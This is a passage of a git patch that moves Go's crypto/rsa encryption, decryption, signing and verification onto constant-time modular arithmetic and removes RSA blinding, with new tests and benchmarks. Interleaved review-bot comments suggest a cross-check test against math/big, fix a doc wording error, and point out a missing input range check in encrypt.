951+ y: 0x7FFF_FFFF_FFFF_FFFF,
952+ expected: []byte{7},
953+ }, {
954+ m: []byte{13},
955+ x: []byte{7},
956+ y: 0x7FFF_FFFF_FFFF_FFFF,
957+ expected: []byte{11},
958+ }, {
959+ m: []byte{0x06, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0d},
960+ x: make([]byte, 9),
961+ y: 0x7FFF_FFFF_FFFF_FFFF,
962+ expected: []byte{0x00, 0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff},
963+ }, {
964+ m: []byte{0x06, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0d},
965+ x: []byte{0x00, 0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff},
966+ y: 0,
967+ expected: []byte{0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08},
968+ }}
969+
970+ for i, tt := range examples {
971+ m := modulusFromNat(natFromBytes(tt.m))
972+ got := natFromBytes(tt.x).expandFor(m).shiftIn(uint(tt.y), m)
973+ if got.cmpEq(natFromBytes(tt.expected).expandFor(m)) != 1 {
974+ t.Errorf("%d: got %x, expected %x", i, got, tt.expected)
975+ }
976+ }
977+}
978+
979+func TestModulusAndNatSizes(t *testing.T) {
980+ // These are 126 bit (2 * _W on 64-bit architectures) values, serialized as
981+ // 128 bits worth of bytes. If leading zeroes are stripped, they fit in two
982+ // limbs, if they are not, they fit in three. This can be a problem because
983+ // modulus strips leading zeroes and nat does not.
984+ m := modulusFromNat(natFromBytes([]byte{
985+ 0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
986+ 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff}))
987+ x := natFromBytes([]byte{
988+ 0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
989+ 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe})
990+ x.expandFor(m) // must not panic for shrinking
991+}
992+
993+func TestExpand(t *testing.T) {
994+ sliced := []uint{1, 2, 3, 4}
995+ examples := []struct {
996+ in []uint
997+ n int
998+ out []uint
999+ }{{
1000+ []uint{1, 2},
1001+ 4,
1002+ []uint{1, 2, 0, 0},
1003+ }, {
1004+ sliced[:2],
1005+ 4,
1006+ []uint{1, 2, 0, 0},
1007+ }, {
1008+ []uint{1, 2},
1009+ 2,
1010+ []uint{1, 2},
1011+ }, {
1012+ []uint{1, 2, 0},
1013+ 2,
1014+ []uint{1, 2},
1015+ }}
1016+
1017+ for i, tt := range examples {
1018+ got := (&nat{tt.in}).expand(tt.n)
1019+ if len(got.limbs) != len(tt.out) || got.cmpEq(&nat{tt.out}) != 1 {
1020+ t.Errorf("%d: got %x, expected %x", i, got, tt.out)
1021+ }
1022+ }
1023+}
1024+
1025+func TestMod(t *testing.T) {
1026+ m := modulusFromNat(natFromBytes([]byte{0x06, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0d}))
1027+ x := natFromBytes([]byte{0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01})
1028+ out := new(nat)
1029+ out.mod(x, m)
1030+ expected := natFromBytes([]byte{0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x09})
1031+ if out.cmpEq(expected) != 1 {
1032+ t.Errorf("%+v != %+v", out, expected)
1033+ }
1034+}
1035+
1036+func TestModSub(t *testing.T) {
1037+ m := modulusFromNat(&nat{[]uint{13}})
1038+ x := &nat{[]uint{6}}
1039+ y := &nat{[]uint{7}}
1040+ x.modSub(y, m)
1041+ expected := &nat{[]uint{12}}
1042+ if x.cmpEq(expected) != 1 {
1043+ t.Errorf("%+v != %+v", x, expected)
1044+ }
1045+ x.modSub(y, m)
1046+ expected = &nat{[]uint{5}}
1047+ if x.cmpEq(expected) != 1 {
1048+ t.Errorf("%+v != %+v", x, expected)
1049+ }
1050+}
1051+
1052+func TestModAdd(t *testing.T) {
1053+ m := modulusFromNat(&nat{[]uint{13}})
1054+ x := &nat{[]uint{6}}
1055+ y := &nat{[]uint{7}}
1056+ x.modAdd(y, m)
1057+ expected := &nat{[]uint{0}}
1058+ if x.cmpEq(expected) != 1 {
1059+ t.Errorf("%+v != %+v", x, expected)
1060+ }
1061+ x.modAdd(y, m)
1062+ expected = &nat{[]uint{7}}
1063+ if x.cmpEq(expected) != 1 {
1064+ t.Errorf("%+v != %+v", x, expected)
1065+ }
1066+}
1067+
1068+func TestExp(t *testing.T) {
1069+ m := modulusFromNat(&nat{[]uint{13}})
1070+ x := &nat{[]uint{3}}
1071+ out := &nat{[]uint{0}}
1072+ out.exp(x, []byte{12}, m)
1073+ expected := &nat{[]uint{1}}
1074+ if out.cmpEq(expected) != 1 {
1075+ t.Errorf("%+v != %+v", out, expected)
1076+ }
1077+}
1078+
1079+func makeBenchmarkModulus() *modulus {
1080+ m := make([]uint, 32)
1081+ for i := 0; i < 32; i++ {
1082+ m[i] = _MASK
1083+ }
1084+ return modulusFromNat(&nat{limbs: m})
1085+}
1086+
1087+func makeBenchmarkValue() *nat {
1088+ x := make([]uint, 32)
1089+ for i := 0; i < 32; i++ {
1090+ x[i] = _MASK - 1
1091+ }
1092+ return &nat{limbs: x}
1093+}
1094+
1095+func makeBenchmarkExponent() []byte {
1096+ e := make([]byte, 256)
1097+ for i := 0; i < 32; i++ {
1098+ e[i] = 0xFF
1099+ }
1100+ return e
1101+}
1102+
1103+func BenchmarkModAdd(b *testing.B) {
1104+ x := makeBenchmarkValue()
1105+ y := makeBenchmarkValue()
1106+ m := makeBenchmarkModulus()
1107+
1108+ b.ResetTimer()
1109+ for i := 0; i < b.N; i++ {
1110+ x.modAdd(y, m)
1111+ }
1112+}
1113+
1114+func BenchmarkModSub(b *testing.B) {
1115+ x := makeBenchmarkValue()
1116+ y := makeBenchmarkValue()
1117+ m := makeBenchmarkModulus()
1118+
1119+ b.ResetTimer()
1120+ for i := 0; i < b.N; i++ {
1121+ x.modSub(y, m)
1122+ }
1123+}
1124+
1125+func BenchmarkMontgomeryRepr(b *testing.B) {
1126+ x := makeBenchmarkValue()
1127+ m := makeBenchmarkModulus()
1128+
1129+ b.ResetTimer()
1130+ for i := 0; i < b.N; i++ {
1131+ x.montgomeryRepresentation(m)
1132+ }
1133+}
1134+
1135+func BenchmarkMontgomeryMul(b *testing.B) {
1136+ x := makeBenchmarkValue()
1137+ y := makeBenchmarkValue()
1138+ out := makeBenchmarkValue()
1139+ m := makeBenchmarkModulus()
1140+
1141+ b.ResetTimer()
1142+ for i := 0; i < b.N; i++ {
1143+ out.montgomeryMul(x, y, m)
1144+ }
1145+}
1146+
1147+func BenchmarkModMul(b *testing.B) {
1148+ x := makeBenchmarkValue()
1149+ y := makeBenchmarkValue()
1150+ m := makeBenchmarkModulus()
1151+
1152+ b.ResetTimer()
1153+ for i := 0; i < b.N; i++ {
1154+ x.modMul(y, m)
1155+ }
1156+}
1157+
1158+func BenchmarkExpBig(b *testing.B) {
1159+ out := new(big.Int)
1160+ exponentBytes := makeBenchmarkExponent()
1161+ x := new(big.Int).SetBytes(exponentBytes)
1162+ e := new(big.Int).SetBytes(exponentBytes)
1163+ n := new(big.Int).SetBytes(exponentBytes)
1164+ one := new(big.Int).SetUint64(1)
1165+ n.Add(n, one)
1166+
1167+ b.ResetTimer()
1168+ for i := 0; i < b.N; i++ {
1169+ out.Exp(x, e, n)
1170+ }
1171+}
1172+
1173+func BenchmarkExp(b *testing.B) {
1174+ x := makeBenchmarkValue()
1175+ e := makeBenchmarkExponent()
1176+ out := makeBenchmarkValue()
1177+ m := makeBenchmarkModulus()
1178+
1179+ b.ResetTimer()
1180+ for i := 0; i < b.N; i++ {
1181+ out.exp(x, e, m)
1182+ }
1183+}
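Review bot: TestExp is the only asserted check on exp, and it uses a one-limb modulus (13) with a one-byte exponent, so exp over a multi-limb modulus with a multi-byte exponent is run only by BenchmarkExp, which asserts nothing. Because exp is the constant-time replacement for big.Int.Exp on the private-key path, I would add a cross-check against math/big, which this file already imports. The values in the sketch below are constructed samples: an odd two-limb modulus, a base smaller than it, and a three-byte exponent.

```go
func TestExpMatchesBig(t *testing.T) {
	// Constructed sample values; x is already below m.
	mBytes := []byte{0x06, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0d}
	xBytes := []byte{0x01, 0x23, 0x45, 0x67, 0x89, 0xab, 0xcd, 0xef, 0x01}
	e := []byte{0x01, 0x00, 0x01}

	m := modulusFromNat(natFromBytes(mBytes))
	x := natFromBytes(xBytes).expandFor(m)
	got := new(nat).exp(x, e, m).fillBytes(make([]byte, len(mBytes)))

	want := new(big.Int).Exp(
		new(big.Int).SetBytes(xBytes),
		new(big.Int).SetBytes(e),
		new(big.Int).SetBytes(mBytes),
	).FillBytes(make([]byte, len(mBytes)))
	if !bytes.Equal(got, want) {
		t.Errorf("%x != %x", got, want)
	}
}
```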
1184diff --git a/src/crypto/rsa/pkcs1v15.go b/src/crypto/rsa/pkcs1v15.go
1185index a216be3..ce89f92 100644
1186--- a/src/crypto/rsa/pkcs1v15.go
1187+++ b/src/crypto/rsa/pkcs1v15.go
1188@@ -9,7 +9,6 @@ import (
1189 "crypto/subtle"
1190 "errors"
1191 "io"
1192- "math/big"
1193
1194 "crypto/internal/randutil"
1195 )
1196@@ -58,14 +57,11 @@ func EncryptPKCS1v15(rand io.Reader, pub *PublicKey, msg []byte) ([]byte, error)
1197 em[len(em)-len(msg)-1] = 0
1198 copy(mm, msg)
1199
1200- m := new(big.Int).SetBytes(em)
1201- c := encrypt(new(big.Int), pub, m)
1202-
1203- return c.FillBytes(em), nil
1204+ return encrypt(pub, em), nil
1205 }
1206
1207 // DecryptPKCS1v15 decrypts a plaintext using RSA and the padding scheme from PKCS#1 v1.5.
1208-// If rand != nil, it uses RSA blinding to avoid timing side-channel attacks.
1209+// The rand parameter is legacy and ignored, and it can be as nil.
1210 //
1211 // Note that whether this function returns an error or not discloses secret
1212 // information. If an attacker can cause this function to run repeatedly and
1213@@ -76,7 +72,7 @@ func DecryptPKCS1v15(rand io.Reader, priv *PrivateKey, ciphertext []byte) ([]byt
1214 if err := checkPub(&priv.PublicKey); err != nil {
1215 return nil, err
1216 }
1217- valid, out, index, err := decryptPKCS1v15(rand, priv, ciphertext)
1218+ valid, out, index, err := decryptPKCS1v15(priv, ciphertext)
1219 if err != nil {
1220 return nil, err
1221 }
1222@@ -87,7 +83,7 @@ func DecryptPKCS1v15(rand io.Reader, priv *PrivateKey, ciphertext []byte) ([]byt
1223 }
1224
1225 // DecryptPKCS1v15SessionKey decrypts a session key using RSA and the padding scheme from PKCS#1 v1.5.
1226-// If rand != nil, it uses RSA blinding to avoid timing side-channel attacks.
1227+// The rand parameter is legacy and ignored, and it can be as nil.
1228 // It returns an error if the ciphertext is the wrong length or if the
1229 // ciphertext is greater than the public modulus. Otherwise, no error is
1230 // returned. If the padding is valid, the resulting plaintext message is copied
1231@@ -114,7 +110,7 @@ func DecryptPKCS1v15SessionKey(rand io.Reader, priv *PrivateKey, ciphertext []by
1232 return ErrDecryption
1233 }
1234
1235- valid, em, index, err := decryptPKCS1v15(rand, priv, ciphertext)
1236+ valid, em, index, err := decryptPKCS1v15(priv, ciphertext)
1237 if err != nil {
1238 return err
1239 }
1240@@ -130,26 +126,24 @@ func DecryptPKCS1v15SessionKey(rand io.Reader, priv *PrivateKey, ciphertext []by
1241 return nil
1242 }
1243
1244-// decryptPKCS1v15 decrypts ciphertext using priv and blinds the operation if
1245-// rand is not nil. It returns one or zero in valid that indicates whether the
1246-// plaintext was correctly structured. In either case, the plaintext is
1247-// returned in em so that it may be read independently of whether it was valid
1248-// in order to maintain constant memory access patterns. If the plaintext was
1249-// valid then index contains the index of the original message in em.
1250-func decryptPKCS1v15(rand io.Reader, priv *PrivateKey, ciphertext []byte) (valid int, em []byte, index int, err error) {
1251+// decryptPKCS1v15 decrypts ciphertext using priv. It returns one or zero in
1252+// valid that indicates whether the plaintext was correctly structured.
1253+// In either case, the plaintext is returned in em so that it may be read
1254+// independently of whether it was valid in order to maintain constant memory
1255+// access patterns. If the plaintext was valid then index contains the index of
1256+// the original message in em, to allow constant time padding removal.
1257+func decryptPKCS1v15(priv *PrivateKey, ciphertext []byte) (valid int, em []byte, index int, err error) {
1258 k := priv.Size()
1259 if k < 11 {
1260 err = ErrDecryption
1261 return
1262 }
1263
1264- c := new(big.Int).SetBytes(ciphertext)
1265- m, err := decrypt(rand, priv, c)
1266+ em, err = decrypt(priv, ciphertext)
1267 if err != nil {
1268 return
1269 }
1270
1271- em = m.FillBytes(make([]byte, k))
1272 firstByteIsZero := subtle.ConstantTimeByteEq(em[0], 0)
1273 secondByteIsTwo := subtle.ConstantTimeByteEq(em[1], 2)
1274
1275@@ -221,8 +215,7 @@ var hashPrefixes = map[crypto.Hash][]byte{
1276 // function. If hash is zero, hashed is signed directly. This isn't
1277 // advisable except for interoperability.
1278 //
1279-// If rand is not nil then RSA blinding will be used to avoid timing
1280-// side-channel attacks.
1281+// The rand parameter is legacy and ignored, and it can be as nil.
1282 //
1283 // This function is deterministic. Thus, if the set of possible
1284 // messages is small, an attacker may be able to build a map from
1285@@ -249,13 +242,7 @@ func SignPKCS1v15(rand io.Reader, priv *PrivateKey, hash crypto.Hash, hashed []b
1286 copy(em[k-tLen:k-hashLen], prefix)
1287 copy(em[k-hashLen:k], hashed)
1288
1289- m := new(big.Int).SetBytes(em)
1290- c, err := decryptAndCheck(rand, priv, m)
1291- if err != nil {
1292- return nil, err
1293- }
1294-
1295- return c.FillBytes(em), nil
1296+ return decryptAndCheck(priv, em)
1297 }
1298
1299 // VerifyPKCS1v15 verifies an RSA PKCS#1 v1.5 signature.
1300@@ -275,9 +262,7 @@ func VerifyPKCS1v15(pub *PublicKey, hash crypto.Hash, hashed []byte, sig []byte)
1301 return ErrVerification
1302 }
1303
1304- c := new(big.Int).SetBytes(sig)
1305- m := encrypt(new(big.Int), pub, c)
1306- em := m.FillBytes(make([]byte, k))
1307+ em := encrypt(pub, sig)
1308 // EM = 0x00 || 0x01 || PS || 0x00 || T
1309
1310 ok := subtle.ConstantTimeByteEq(em[0], 0)
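Review bot: The replacement doc sentence `// The rand parameter is legacy and ignored, and it can be as nil.` is ungrammatical ("can be as nil") and lands in exported API documentation. It is added on DecryptPKCS1v15, DecryptPKCS1v15SessionKey and SignPKCS1v15 in this file, and the same wording appears on DecryptOAEP in rsa.go. I would write `// The rand parameter is legacy and ignored, and it can be nil.` in all four places. Since the removed lines promised blinding when rand was non-nil, one more clause saying the private-key operation no longer depends on rand would tell existing callers that passing a reader changes nothing.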
1311diff --git a/src/crypto/rsa/pss.go b/src/crypto/rsa/pss.go
1312index 814522d..eaba4be 100644
1313--- a/src/crypto/rsa/pss.go
1314+++ b/src/crypto/rsa/pss.go
1315@@ -12,7 +12,6 @@ import (
1316 "errors"
1317 "hash"
1318 "io"
1319- "math/big"
1320 )
1321
1322 // Per RFC 8017, Section 9.1
1323@@ -207,19 +206,27 @@ func emsaPSSVerify(mHash, em []byte, emBits, sLen int, hash hash.Hash) error {
1324 // Note that hashed must be the result of hashing the input message using the
1325 // given hash function. salt is a random sequence of bytes whose length will be
1326 // later used to verify the signature.
1327-func signPSSWithSalt(rand io.Reader, priv *PrivateKey, hash crypto.Hash, hashed, salt []byte) ([]byte, error) {
1328- emBits := priv.N.BitLen() - 1
1329+func signPSSWithSalt(priv *PrivateKey, hash crypto.Hash, hashed, salt []byte) ([]byte, error) {
1330+ emBits := bigBitLen(priv.N) - 1
1331 em, err := emsaPSSEncode(hashed, emBits, salt, hash.New())
1332 if err != nil {
1333 return nil, err
1334 }
1335- m := new(big.Int).SetBytes(em)
1336- c, err := decryptAndCheck(rand, priv, m)
1337- if err != nil {
1338- return nil, err
1339+
1340+ // RFC 8017: "Note that the octet length of EM will be one less than k if
1341+ // modBits - 1 is divisible by 8 and equal to k otherwise, where k is the
1342+ // length in octets of the RSA modulus n."
1343+ //
1344+ // This is extremely annoying, as all other encrypt and decrypt inputs are
1345+ // always the exact same size as the modulus. Since it only happens for
1346+ // weird modulus sizes, fix it by padding inefficiently.
1347+ if emLen, k := len(em), priv.Size(); emLen < k {
1348+ emNew := make([]byte, k)
1349+ copy(emNew[k-emLen:], em)
1350+ em = emNew
1351 }
1352- s := make([]byte, priv.Size())
1353- return c.FillBytes(s), nil
1354+
1355+ return decryptAndCheck(priv, em)
1356 }
1357
1358 const (
1359@@ -269,7 +276,7 @@ func SignPSS(rand io.Reader, priv *PrivateKey, hash crypto.Hash, digest []byte,
1360 saltLength := opts.saltLength()
1361 switch saltLength {
1362 case PSSSaltLengthAuto:
1363- saltLength = (priv.N.BitLen()-1+7)/8 - 2 - hash.Size()
1364+ saltLength = (bigBitLen(priv.N)-1+7)/8 - 2 - hash.Size()
1365 case PSSSaltLengthEqualsHash:
1366 saltLength = hash.Size()
1367 }
1368@@ -278,7 +285,7 @@ func SignPSS(rand io.Reader, priv *PrivateKey, hash crypto.Hash, digest []byte,
1369 if _, err := io.ReadFull(rand, salt); err != nil {
1370 return nil, err
1371 }
1372- return signPSSWithSalt(rand, priv, hash, digest, salt)
1373+ return signPSSWithSalt(priv, hash, digest, salt)
1374 }
1375
1376 // VerifyPSS verifies a PSS signature.
1377@@ -291,13 +298,22 @@ func VerifyPSS(pub *PublicKey, hash crypto.Hash, digest []byte, sig []byte, opts
1378 if len(sig) != pub.Size() {
1379 return ErrVerification
1380 }
1381- s := new(big.Int).SetBytes(sig)
1382- m := encrypt(new(big.Int), pub, s)
1383- emBits := pub.N.BitLen() - 1
1384+
1385+ emBits := bigBitLen(pub.N) - 1
1386 emLen := (emBits + 7) / 8
1387- if m.BitLen() > emLen*8 {
1388- return ErrVerification
1389+ em := encrypt(pub, sig)
1390+
1391+ // Like in signPSSWithSalt, deal with mismatches between emLen and the size
1392+ // of the modulus. The spec would have us wire emLen into the encoding
1393+ // function, but we'd rather always encode to the size of the modulus and
1394+ // then strip leading zeroes if necessary. This only happens for weird
1395+ // modulus sizes anyway.
1396+ for len(em) > emLen && len(em) > 0 {
1397+ if em[0] != 0 {
1398+ return ErrVerification
1399+ }
1400+ em = em[1:]
1401 }
1402- em := m.FillBytes(make([]byte, emLen))
1403+
1404 return emsaPSSVerify(digest, em, emBits, opts.saltLength(), hash.New())
1405 }
1406diff --git a/src/crypto/rsa/pss_test.go b/src/crypto/rsa/pss_test.go
1407index c3a6d46..d018b43 100644
1408--- a/src/crypto/rsa/pss_test.go
1409+++ b/src/crypto/rsa/pss_test.go
1410@@ -233,7 +233,10 @@ func TestPSSSigning(t *testing.T) {
1411 }
1412 }
1413
1414-func TestSignWithPSSSaltLengthAuto(t *testing.T) {
1415+func TestPSS513(t *testing.T) {
1416+ // See Issue 42741, and separately, RFC 8017: "Note that the octet length of
1417+ // EM will be one less than k if modBits - 1 is divisible by 8 and equal to
1418+ // k otherwise, where k is the length in octets of the RSA modulus n."
1419 key, err := GenerateKey(rand.Reader, 513)
1420 if err != nil {
1421 t.Fatal(err)
1422@@ -246,8 +249,9 @@ func TestSignWithPSSSaltLengthAuto(t *testing.T) {
1423 if err != nil {
1424 t.Fatal(err)
1425 }
1426- if len(signature) == 0 {
1427- t.Fatal("empty signature returned")
1428+ err = VerifyPSS(&key.PublicKey, crypto.SHA256, digest[:], signature, nil)
1429+ if err != nil {
1430+ t.Error(err)
1431 }
1432 }
1433
1434diff --git a/src/crypto/rsa/rsa.go b/src/crypto/rsa/rsa.go
1435index 5a00ed2..29d9d31 100644
1436--- a/src/crypto/rsa/rsa.go
1437+++ b/src/crypto/rsa/rsa.go
1438@@ -19,13 +19,17 @@
1439 // over the public key primitive, the PrivateKey type implements the
1440 // Decrypter and Signer interfaces from the crypto package.
1441 //
1442-// The RSA operations in this package are not implemented using constant-time algorithms.
1443+// Operations in this package are implemented using constant-time algorithms,
1444+// except for [GenerateKey], [PrivateKey.Precompute], and [PrivateKey.Validate].
1445+// Every other operation only leaks the bit size of the involved values, which
1446+// all depend on the selected key size.
1447 package rsa
1448
1449 import (
1450 "crypto"
1451 "crypto/rand"
1452 "crypto/subtle"
1453+ "encoding/binary"
1454 "errors"
1455 "hash"
1456 "io"
1457@@ -35,7 +39,6 @@ import (
1458 "crypto/internal/randutil"
1459 )
1460
1461-var bigZero = big.NewInt(0)
1462 var bigOne = big.NewInt(1)
1463
1464 // A PublicKey represents the public part of an RSA key.
1465@@ -47,7 +50,7 @@ type PublicKey struct {
1466 // Size returns the modulus size in bytes. Raw signatures and ciphertexts
1467 // for or by this public key will have the same size.
1468 func (pub *PublicKey) Size() int {
1469- return (pub.N.BitLen() + 7) / 8
1470+ return (bigBitLen(pub.N) + 7) / 8
1471 }
1472
1473 // OAEPOptions is an interface for passing options to OAEP decryption using the
1474@@ -351,10 +354,19 @@ func mgf1XOR(out []byte, hash hash.Hash, seed []byte) {
1475 // too large for the size of the public key.
1476 var ErrMessageTooLong = errors.New("crypto/rsa: message too long for RSA public key size")
1477
1478-func encrypt(c *big.Int, pub *PublicKey, m *big.Int) *big.Int {
1479- e := big.NewInt(int64(pub.E))
1480- c.Exp(m, e, pub.N)
1481- return c
1482+func encrypt(pub *PublicKey, plaintext []byte) []byte {
1483+
1484+ N := modulusFromNat(natFromBig(pub.N))
1485+ m := natFromBytes(plaintext).expandFor(N)
1486+
1487+ e := make([]byte, 8)
1488+ binary.BigEndian.PutUint64(e, uint64(pub.E))
1489+ for len(e) > 1 && e[0] == 0 {
1490+ e = e[1:]
1491+ }
1492+
1493+ out := make([]byte, modulusSize(N))
1494+ return new(nat).exp(m, e, N).fillBytes(out)
1495 }
1496
1497 // EncryptOAEP encrypts the given message with RSA-OAEP.
1498@@ -404,12 +416,7 @@ func EncryptOAEP(hash hash.Hash, random io.Reader, pub *PublicKey, msg []byte, l
1499 mgf1XOR(db, hash, seed)
1500 mgf1XOR(seed, hash, db)
1501
1502- m := new(big.Int)
1503- m.SetBytes(em)
1504- c := encrypt(new(big.Int), pub, m)
1505-
1506- out := make([]byte, k)
1507- return c.FillBytes(out), nil
1508+ return encrypt(pub, em), nil
1509 }
1510
1511 // ErrDecryption represents a failure to decrypt a message.
1512@@ -451,98 +458,71 @@ func (priv *PrivateKey) Precompute() {
1513 }
1514 }
1515
1516-// decrypt performs an RSA decryption, resulting in a plaintext integer. If a
1517-// random source is given, RSA blinding is used.
1518-func decrypt(random io.Reader, priv *PrivateKey, c *big.Int) (m *big.Int, err error) {
1519- // TODO(agl): can we get away with reusing blinds?
1520- if c.Cmp(priv.N) > 0 {
1521- err = ErrDecryption
1522- return
1523+// decrypt performs an RSA decryption of ciphertext into out.
1524+func decrypt(priv *PrivateKey, ciphertext []byte) ([]byte, error) {
1525+
1526+ N := modulusFromNat(natFromBig(priv.N))
1527+ c := natFromBytes(ciphertext).expandFor(N)
1528+ if c.cmpGeq(N.nat) == 1 {
1529+ return nil, ErrDecryption
1530 }
1531 if priv.N.Sign() == 0 {
1532 return nil, ErrDecryption
1533 }
1534
1535- var ir *big.Int
1536- if random != nil {
1537- randutil.MaybeReadByte(random)
1538-
1539- // Blinding enabled. Blinding involves multiplying c by r^e.
1540- // Then the decryption operation performs (m^e * r^e)^d mod n
1541- // which equals mr mod n. The factor of r can then be removed
1542- // by multiplying by the multiplicative inverse of r.
1543-
1544- var r *big.Int
1545- ir = new(big.Int)
1546- for {
1547- r, err = rand.Int(random, priv.N)
1548- if err != nil {
1549- return
1550- }
1551- if r.Cmp(bigZero) == 0 {
1552- r = bigOne
1553- }
1554- ok := ir.ModInverse(r, priv.N)
1555- if ok != nil {
1556- break
1557- }
1558- }
1559- bigE := big.NewInt(int64(priv.E))
1560- rpowe := new(big.Int).Exp(r, bigE, priv.N) // N != 0
1561- cCopy := new(big.Int).Set(c)
1562- cCopy.Mul(cCopy, rpowe)
1563- cCopy.Mod(cCopy, priv.N)
1564- c = cCopy
1565- }
1566-
1567+ // Note that because our private decryption exponents are stored as big.Int,
1568+ // we potentially leak the exact number of bits of these exponents. This
1569+ // isn't great, but should be fine.
1570 if priv.Precomputed.Dp == nil {
1571- m = new(big.Int).Exp(c, priv.D, priv.N)
1572- } else {
1573- // We have the precalculated values needed for the CRT.
1574- m = new(big.Int).Exp(c, priv.Precomputed.Dp, priv.Primes[0])
1575- m2 := new(big.Int).Exp(c, priv.Precomputed.Dq, priv.Primes[1])
1576- m.Sub(m, m2)
1577- if m.Sign() < 0 {
1578- m.Add(m, priv.Primes[0])
1579- }
1580- m.Mul(m, priv.Precomputed.Qinv)
1581- m.Mod(m, priv.Primes[0])
1582- m.Mul(m, priv.Primes[1])
1583- m.Add(m, m2)
1584-
1585- for i, values := range priv.Precomputed.CRTValues {
1586- prime := priv.Primes[2+i]
1587- m2.Exp(c, values.Exp, prime)
1588- m2.Sub(m2, m)
1589- m2.Mul(m2, values.Coeff)
1590- m2.Mod(m2, prime)
1591- if m2.Sign() < 0 {
1592- m2.Add(m2, prime)
1593- }
1594- m2.Mul(m2, values.R)
1595- m.Add(m, m2)
1596- }
1597- }
1598-
1599- if ir != nil {
1600- // Unblind.
1601- m.Mul(m, ir)
1602- m.Mod(m, priv.N)
1603- }
1604-
1605- return
1606+ out := make([]byte, modulusSize(N))
1607+ return new(nat).exp(c, priv.D.Bytes(), N).fillBytes(out), nil
1608+ }
1609+
1610+ t0 := new(nat)
1611+ P := modulusFromNat(natFromBig(priv.Primes[0]))
1612+ Q := modulusFromNat(natFromBig(priv.Primes[1]))
1613+ // m = c ^ Dp mod p
1614+ m := new(nat).exp(t0.mod(c, P), priv.Precomputed.Dp.Bytes(), P)
1615+ // m2 = c ^ Dq mod q
1616+ m2 := new(nat).exp(t0.mod(c, Q), priv.Precomputed.Dq.Bytes(), Q)
1617+ // m = m - m2 mod p
1618+ m.modSub(t0.mod(m2, P), P)
1619+ // m = m * Qinv mod p
1620+ m.modMul(natFromBig(priv.Precomputed.Qinv).expandFor(P), P)
1621+ // m = m * q mod N
1622+ m.expandFor(N).modMul(t0.mod(Q.nat, N), N)
1623+ // m = m + m2 mod N
1624+ m.modAdd(m2.expandFor(N), N)
1625+
1626+ for i, values := range priv.Precomputed.CRTValues {
1627+ p := modulusFromNat(natFromBig(priv.Primes[2+i]))
1628+ // m2 = c ^ Exp mod p
1629+ m2.exp(t0.mod(c, p), values.Exp.Bytes(), p)
1630+ // m2 = m2 - m mod p
1631+ m2.modSub(t0.mod(m, p), p)
1632+ // m2 = m2 * Coeff mod p
1633+ m2.modMul(natFromBig(values.Coeff).expandFor(p), p)
1634+ // m2 = m2 * R mod N
1635+ R := natFromBig(values.R).expandFor(N)
1636+ m2.expandFor(N).modMul(R, N)
1637+ // m = m + m2 mod N
1638+ m.modAdd(m2, N)
1639+ }
1640+
1641+ out := make([]byte, modulusSize(N))
1642+ return m.fillBytes(out), nil
1643 }
1644
1645-func decryptAndCheck(random io.Reader, priv *PrivateKey, c *big.Int) (m *big.Int, err error) {
1646- m, err = decrypt(random, priv, c)
1647+func decryptAndCheck(priv *PrivateKey, ciphertext []byte) (m []byte, err error) {
1648+ m, err = decrypt(priv, ciphertext)
1649 if err != nil {
1650 return nil, err
1651 }
1652
1653 // In order to defend against errors in the CRT computation, m^e is
1654 // calculated, which should match the original ciphertext.
1655- check := encrypt(new(big.Int), &priv.PublicKey, m)
1656- if c.Cmp(check) != 0 {
1657+ check := encrypt(&priv.PublicKey, m)
1658+ if subtle.ConstantTimeCompare(ciphertext, check) != 1 {
1659 return nil, errors.New("rsa: internal error")
1660 }
1661 return m, nil
1662@@ -554,9 +534,7 @@ func decryptAndCheck(random io.Reader, priv *PrivateKey, c *big.Int) (m *big.Int
1663 // Encryption and decryption of a given message must use the same hash function
1664 // and sha256.New() is a reasonable choice.
1665 //
1666-// The random parameter, if not nil, is used to blind the private-key operation
1667-// and avoid timing side-channel attacks. Blinding is purely internal to this
1668-// function – the random data need not match that used when encrypting.
1669+// The random parameter is legacy and ignored, and it can be as nil.
1670 //
1671 // The label parameter must match the value given when encrypting. See
1672 // EncryptOAEP for details.
1673@@ -570,9 +548,7 @@ func DecryptOAEP(hash hash.Hash, random io.Reader, priv *PrivateKey, ciphertext
1674 return nil, ErrDecryption
1675 }
1676
1677- c := new(big.Int).SetBytes(ciphertext)
1678-
1679- m, err := decrypt(random, priv, c)
1680+ em, err := decrypt(priv, ciphertext)
1681 if err != nil {
1682 return nil, err
1683 }
1684@@ -581,10 +557,6 @@ func DecryptOAEP(hash hash.Hash, random io.Reader, priv *PrivateKey, ciphertext
1685 lHash := hash.Sum(nil)
1686 hash.Reset()
1687
1688- // We probably leak the number of leading zeros.
1689- // It's not clear that we can do anything about this.
1690- em := m.FillBytes(make([]byte, k))
1691-
1692 firstByteIsZero := subtle.ConstantTimeByteEq(em[0], 0)
1693
1694 seed := em[1 : hash.Size()+1]
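Review bot: In encrypt (the `@@ -351,10 +354,19 @@` hunk), `natFromBytes(plaintext).expandFor(N)` is passed to exp without checking that the value is below N, although exp's comment in nat.go says x must already be reduced modulo m. decrypt, in the following hunk, does guard its input with `c.cmpGeq(N.nat) == 1`, so the two paths are inconsistent. VerifyPKCS1v15 and VerifyPSS pass a caller-supplied signature to encrypt, and the visible context shows only a length comparison before the call, so an out-of-range value appears to reach the Montgomery code with its precondition unmet. What is computed in that case cannot be determined from this page. I would have encrypt return `([]byte, error)` and fail on `if m.cmpGeq(N.nat) == 1`, with the verify functions mapping that failure to ErrVerification.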
1695--
16962.25.1
1697
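--- /dev/null
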